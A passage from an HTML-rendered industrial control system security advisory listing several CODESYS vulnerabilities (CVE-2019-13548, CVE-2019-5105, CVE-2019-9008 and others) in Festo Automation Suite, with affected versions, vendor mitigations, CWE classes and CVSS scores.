<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-13548</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which could cause a stack overflow and create a denial-of-service condition or allow remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-13548">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-18858</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS 3 web server before 3.5.15.20, as distributed with CODESYS Control runtime systems, has a Buffer Overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-18858">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/120.html">CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-19789</a></h3>
<div class="csaf-accordion-content">
<p>3S-Smart CODESYS SP Realtime NT before V2.3.7.28, CODESYS Runtime Toolkit 32 bit full before V2.4.7.54, and CODESYS PLCWinNT before V2.4.7.54 allow a NULL pointer dereference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-19789">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-5105</a></h3>
<div class="csaf-accordion-content">
<p>An exploitable memory corruption vulnerability exists in the Name Service Client functionality of 3S-Smart Software Solutions CODESYS GatewayService. A specially crafted packet can cause a large memcpy, resulting in an access violation and termination of the process. An attacker can send a packet to a device running the GatewayService.exe to trigger this vulnerability. All variants of the CODESYS V3 products in all versions prior V3.5.16.10 containing the CmpRouter or CmpRouterEmbedded component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PLCnext, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Edge Gateway V3, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Simulation Runtime (part of the CODESYS Development System).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-5105">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9008</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in 3S-Smart CODESYS V3 through 3.5.12.30. A user with low privileges can take full control over the runtime.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9008">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/732.html">CWE-732 Incorrect Permission Assignment for Critical Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9009</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in 3S-Smart CODESYS before 3.5.15.0 . Crafted network packets cause the Control Runtime to crash.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9009">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/755.html">CWE-755 Improper Handling of Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9010</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in 3S-Smart CODESYS V3 products. The CODESYS Gateway does not correctly verify the ownership of a communication channel. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9010">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/284.html">CWE-284 Improper Access Control</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
